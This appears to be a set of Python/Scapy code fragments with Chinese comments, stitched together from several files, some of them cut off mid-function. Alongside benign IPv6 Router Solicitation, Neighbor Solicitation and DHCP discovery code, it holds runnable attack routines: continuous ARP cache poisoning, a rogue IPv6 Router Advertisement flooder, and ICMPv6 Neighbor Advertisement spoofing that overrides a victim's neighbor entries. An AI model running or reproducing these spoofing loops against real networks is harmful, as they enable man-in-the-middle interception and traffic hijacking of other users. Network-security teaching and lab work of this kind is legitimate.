def icmpv6_rs(ifname): ll_mac = get_mac_address(ifname) # 获取本机接口MAC地址 # -----------IPv6头部------------ # Next Header: 0x3A (ICMPv6) # 原地址: Link Local address # 目的地址: FF02::2(所有路由器) # 可以省略 src=mac_to_ipv6_linklocal(ll_mac) 来提高效率 base = IPv6(src=mac_to_ipv6_linklocal(ll_mac), dst='ff02::2') # ----------ICMPv6头部---------- # ICMPv6 Type: 133 # ICMPv6 Code: 0 (RS) router_solicitation = ICMPv6ND_RS() # ----Source Link-Layer Address---- # 源地址: 00:50:56:AB:25:08(本地MAC地址) src_ll_addr = ICMPv6NDOptSrcLLAddr(lladdr=ll_mac) # 构建数据包 # packet = base / router_solicitation / src_ll_addr # 最简单的构建方案 packet = IPv6() / ICMPv6ND_RS() # packet.show() # 发送数据包,接受返回数据包 result = sr1(packet, timeout=2, verbose=False) # result.show() # 提取返回数据包中的网关MAC print("gwmac: ", result.getlayer("ICMPv6 Neighbor Discovery Option - Source Link-Layer Address").fields['lladdr']) # 提取返回数据包中的MTU print("mtu: ", result.getlayer("ICMPv6 Neighbor Discovery Option - MTU").fields['mtu']) # 提取返回数据包中的Prefix信息 print("prefix: ", result.getlayer("ICMPv6 Neighbor Discovery Option - Prefix Information").fields['prefix'])
def icmpv6_ra(ifname): # 提取本地MAC ll_mac = get_mac_address(ifname) # -----------IPv6头部------------ # Next Header: 0x3A (ICMPv6) # 原地址: Link Local address # 目的地址: FF02::1(所有节点) # 可以省略mac_to_ipv6_linklocal(ll_mac) 来提高效率 base = IPv6(src=mac_to_ipv6_linklocal(ll_mac), dst='ff02::1') # ----------ICMPv6头部---------- # ICMPv6 Type: 134 # ICMPv6 Code: 0 (RA) router_solicitation = ICMPv6ND_RA() # ----Source Link-Layer Address---- # 源地址: 00:50:56:AB:4D:19(路由器MAC地址),本次为欺骗,所以MAC地址是本地MAC地址 src_ll_addr = ICMPv6NDOptSrcLLAddr(lladdr=ll_mac) # 提供MTU mtu = ICMPv6NDOptMTU(mtu=1500) # 提供前缀 prefix = ICMPv6NDOptPrefixInfo(prefix='2001:2::', prefixlen=64) # 构建数据包 packet = base / router_solicitation / src_ll_addr / mtu / prefix # packet.show() # 一直发送,知道客户使用Ctrl + C终止 while True: try: time.sleep(1) send(packet, verbose=False) print('发送RA数据包') except KeyboardInterrupt: print('退出!')
def arp_spoof(ip_1, ip_2, ifname='Net1'): global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname # 申明全局变量 g_ip_1 = ip_1 # 为全局变量赋值,g_ip_1为被毒化ARP设备的IP地址 g_ip_2 = ip_2 # 为全局变量赋值,g_ip_2为本机伪装设备的IP地址 g_ifname = ifname # 为全局变量赋值,攻击使用的接口名字 # 获取本机IP地址,并且赋值到全局变量localip localip = get_ip_address(ifname) # 获取本机MAC地址,并且赋值到全局变量localmac localmac = get_mac_address(ifname) # 获取ip_1的真实MAC地址 ip_1_mac = arp_request(ip_1, ifname)[1] # 获取ip_2的真实MAC地址 ip_2_mac = arp_request(ip_2, ifname)[1] # 引入信号处理机制,如果出现ctl+c(signal.SIGINT),使用sigint_handler这个方法进行处理 signal.signal(signal.SIGINT, sigint_handler) while True: # 一直攻击,直到ctl+c出现!!! # op=2,响应ARP sendp(Ether(src=localmac, dst=ip_1_mac) / ARP( op=2, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1), iface=scapy_iface(g_ifname), verbose=False) # op=1,请求ARP # sendp(Ether(src=localmac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1), # iface = g_ifname, verbose = False) # 以太网头部的src MAC地址与ARP数据部分的hwsrc MAC不匹配攻击效果相同 # sendp(Ether(src=ip_1_mac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1), # iface = g_ifname, verbose = False) # 如果采用dst为二层广播,会造成被伪装设备告警地址重叠,并且欺骗效果不稳定,容易抖动! print("发送ARP欺骗数据包!欺骗" + ip_1 + ',本机MAC地址为' + ip_2 + '的MAC地址!!!') time.sleep(1)
def icmpv6_na(spoof_host, masquerade_host, ifname): # 发送NA主要用于毒化 ll_mac = get_mac_address(ifname) # 获取本机接口MAC地址 # ----------以太网头部 - --------- # 以太网协议号: 0x86DD(IPv6) # 源目MAC为两个节点的单播地址 # 源为系统本地MAC,Scapy自动产生,目标MAC为被欺骗主机MAC,使用NS获取 dst_mac = icmpv6_ns(spoof_host, ifname) ether = Ether(dst=dst_mac) # -----------IPv6头部------------ # Next Header: 0x3A (ICMPv6) # 原地址: 2001:1::200 伪装地址 # 目的地址: 2001:1::253的Link Local Address,欺骗主机的Link Local Address ipv6 = IPv6(src=masquerade_host, dst=mac_to_ipv6_linklocal(dst_mac)) # R=1 Sender is a router, # S=1 advertisement is sent in response to a Neighbor Solicit, # O=1 override flag # 目标地址: 2001:1::200 伪装地址 neighbor_advertisements = ICMPv6ND_NA( tgt=masquerade_host, R=0, # 我不是路由器 S=0, # 我不是一个NS的响应 O=1) # 我要覆盖 # ----Target Link-Layer Address---- # 源地址: 本地MAC地址 src_ll_addr = ICMPv6NDOptDstLLAddr(lladdr=ll_mac) # 构建完整数据包 packet = ether / ipv6 / neighbor_advertisements / src_ll_addr # 发送数据包 sendp(packet, verbose=False)
def icmpv6_ns(host, ifname): # 请求特定IPv6地址的MAC地址 ll_mac = get_mac_address(ifname) # 获取本机接口MAC地址 # 构建icmpv6_ns数据包 # -----------IPv6头部 - ----------- # Next Header: 0x3A(ICMPv6) # 原地址: Link Local address # 目的地址: Solicited node multicast address # 请求节点组播地址 # # ----------ICMPv6头部 - --------- # ICMPv6 Type: 135 # ICMPv6 Code: 0(NS) # 目标地址: 2001:1::253 # # ----Source Link-Layer Address - --- # 源地址: 00:50:56:AB:25:08(本地MAC地址) # 所有可选都填写 # packet = IPv6(src=mac_to_ipv6_linklocal(ll_mac), # dst=solicited_node_multicast_address(host)) / ICMPv6ND_NS(tgt=host) / ICMPv6NDOptSrcLLAddr(lladdr=ll_mac) # 下面是最精简 # 系统自动产生, IPv6头部(linklocal地址, 请求节点组播地址(并且转换到组播MAC)) # 没有ICMPv6NDOptSrcLLAddr头部一样正常工作 packet = IPv6() / ICMPv6ND_NS(tgt=host) # packet.show() # 发送数据包 result = sr1(packet, timeout=2, verbose=False) # 提取返回的MAC地址 # result.show() return result.getlayer( "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" ).fields['lladdr']
def arp_spoof(ip_1, ip_2, ifname='ZlineNET1'): global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname # g_ip_1 = ip_1 #被毒化arp设备的ip设备 g_ip_2 = ip_2 #本机伪装设备的ip g_ifname = ifname #攻击使用的接口 #获取本机ip和mac localip = get_ip_address(ifname) localmac = get_mac_address(ifname) #获取被攻击的目标的mac ip_1_mac = arp_request(ip_1, ifname)[1] #获取伪装设备的mac signal.signal(signal.SIGINT, sigint_handler) while True: sendp(Ether(src=localmac, dst=ip_1_mac) / ARP( op=2, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1), iface=g_ifname, verbose=False) print('发送ARP欺骗数据包!欺骗' + ip_1 + ',本机MAC地址为' + ip_2 + '的MAC地址!!!!') time.sleep(1)
print('%-15s ==> %s' % (str(option[0]), str(option[1]))) elif pkt.getlayer(DHCP).fields['options'][0][1] == 5: # 发现并且打印DHCP ACK print('发现DHCP ACK包,确认的IP为:' + pkt.getlayer(BOOTP).fields['yiaddr']) print('ACK包中发现如下Options:') for option in pkt.getlayer(DHCP).fields['options']: if option == 'end': break # 打印DHCP ACK的所有选项 print('%-15s ==> %s' % (str(option[0]), str(option[1]))) except Exception as e: print(e) pass def dhcp_full(ifname, mac_address, timeout=3): global global_if global_if = ifname # 发送DHCP Discover数据包 pool.apply_async(dhcp_discover_sendonly, args=(global_if, mac_address)) # 侦听数据包,使用过滤器filter="port 68 and port 67"进行过滤,把捕获的数据包发送给DHCP_Monitor_Control函数进行处理 sniff(prn=dhcp_monitor_control, filter="port 68 and port 67", store=0, iface=scapy_iface(global_if), timeout=timeout) if __name__ == '__main__': # 使用Linux解释器 & WIN解释器 dhcp_full('Net1', get_mac_address('Net1'))
# MAC地址只有6个字节,所以需要把剩余部分填充b'\x00' return info + b'\x00' * (16 - len(info)) def dhcp_discover_sendonly(ifname, mac_address, wait_time=1): bytes_mac = change_mac_to_bytes(mac_address) # 把MAC地址转换为二进制格式 # param_req_list为请求的参数,没有这个部分服务器只会回送IP地址,什么参数都不给 discover = Ether(dst='ff:ff:ff:ff:ff:ff', src=mac_address, type=0x0800) / IP(src='0.0.0.0', dst='255.255.255.255') \ / UDP(dport=67, sport=68) \ / BOOTP(op=1, chaddr=chaddr(bytes_mac)) \ / DHCP(options=[('message-type', 'discover'), ('param_req_list', bytes_requested_options), 'end']) if wait_time != 0: time.sleep(wait_time) sendp(discover, iface=scapy_iface(ifname), verbose=False) else: sendp(discover, iface=scapy_iface(ifname), verbose=False) if __name__ == '__main__': # 使用Linux解释器 & WIN解释器 local_mac = get_mac_address('Net1') dhcp_discover_sendonly('Net1', local_mac)